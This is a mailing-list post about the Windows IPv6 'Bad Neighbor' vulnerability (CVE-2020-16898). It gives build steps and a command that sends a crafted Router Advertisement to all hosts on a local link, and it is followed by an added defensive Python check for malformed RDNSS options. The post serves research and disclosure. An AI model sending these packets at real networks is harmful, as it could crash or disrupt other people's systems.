[lacnog] Fwd: CVE-2020-16898: "Bad Neighbor" (IPv6 SLAAC/RDNSS)
Fernando Gont
fgont at si6networks.com
Wed Oct 14 13:47:56 -03 2020
FYI
-------- Forwarded Message --------
Subject: CVE-2020-16898: "Bad Neighbor" (IPv6 SLAAC/RDNSS)
Date: Wed, 14 Oct 2020 13:24:22 -0300
From: Fernando Gont <fgont at si6networks.com>
To: IPv6 Hackers Mailing List <ipv6hackers at lists.si6networks.com>
Folks,
You may be aware of CVE-2020-16898. If not, now you are :-) :
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/cve-2020-16898-bad-neighbor/
I've produced a PoC for the aforementioned vulnerability according to the
description on the McAfee site, but somehow I seem to fail to trigger
the "Blue Screen Of Death" when trying the attack against my local MS
Windows 10 installation.
FWIW, the packet I'm sending can be downloaded (pcap) here:
https://www.gont.com.ar/pcaps/bad-neighbor.pcap
The packet can be crafted with the ra6 tool of the SI6 toolkit present
in the "nd-opt-fuzzing" branch of the github repo
(https://github.com/fgont/ipv6toolkit). That is,
git clone https://github.com/fgont/ipv6toolkit.git
cd ipv6toolkit
git checkout nd-opt-fuzzing
sudo make install
And then run the ra6 tool as:
sudo ra6 -i INTERFACE --bad-neighbor -d ff02::1 -v -e
Note that this will target all nodes on the local-link for the INTERFACE
interface. You may set the "-d" option to a unicast address if you want
to target a single system.
I'll keep looking further into this issue and report back to the group
if I find anything.
If you do play with the tool and test the PoC, please do let me/us know.
Thanks!
Regards,
--
Fernando Gont
SI6 Networks
e-mail: fgont at si6networks.com
PGP Fingerprint: 6666 31C6 D484 63B2 8FB1 E3C4 AE25 0D55 1D4E 7492
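
A defensive check to go with the message above, as an added example that is not part of the original e-mail or of the SI6 toolkit: since the advisory concerns RDNSS options in Router Advertisements, it flags any RA whose RDNSS option (type 25) breaks the RFC 8106 length rule (odd and at least 3). The function and sample names are hypothetical, and the sample packets are constructed, not captured.

```python
import struct

ND_ROUTER_ADVERT = 134  # ICMPv6 type, RFC 4861
OPT_RDNSS = 25          # Recursive DNS Server option, RFC 8106
RA_FIXED_LEN = 16       # ICMPv6 header (4 bytes) + RA fixed fields (12 bytes)

def check_ra(icmp6: bytes) -> list:
    """Return findings for one ICMPv6 message, given from its type byte on."""
    findings = []
    if len(icmp6) < RA_FIXED_LEN or icmp6[0] != ND_ROUTER_ADVERT:
        return findings  # not a Router Advertisement
    off = RA_FIXED_LEN
    while off + 2 <= len(icmp6):
        opt_type, opt_len = icmp6[off], icmp6[off + 1]
        if opt_len == 0:  # RFC 4861: such packets must be discarded
            findings.append(f"option at offset {off}: zero length")
            break
        size = opt_len * 8  # Length is counted in units of 8 octets
        if off + size > len(icmp6):
            findings.append(f"option type {opt_type} at offset {off}: truncated")
            break
        # RFC 8106: header (1 unit) + 2 units per address => odd and >= 3
        if opt_type == OPT_RDNSS and (opt_len < 3 or opt_len % 2 == 0):
            findings.append(f"RDNSS at offset {off}: invalid length {opt_len}")
        off += size
    return findings

# --- constructed sample input (not captured traffic) ---
def _ra(options: bytes) -> bytes:
    # type, code, checksum (not verified here), hop limit, flags,
    # router lifetime, reachable time, retrans timer
    return struct.pack("!BBHBBHII", ND_ROUTER_ADVERT, 0, 0, 64, 0, 1800, 0, 0) + options

def _rdnss(length: int) -> bytes:
    addr = bytes.fromhex("20010db8" + "00" * 11 + "53")  # 2001:db8::53
    head = struct.pack("!BBHI", OPT_RDNSS, length, 0, 600)
    return head + addr.ljust(length * 8 - 8, b"\x00")

GOOD_RA = _ra(_rdnss(3))  # one address, Length 3
BAD_RA = _ra(_rdnss(4))   # same option declared with an even Length

if __name__ == "__main__":
    for name, pkt in (("GOOD_RA", GOOD_RA), ("BAD_RA", BAD_RA)):
        print(name, check_ra(pkt) or "ok")
```

The input is the ICMPv6 message only, so the IPv6 header and any fragment reassembly have to be handled before calling `check_ra`.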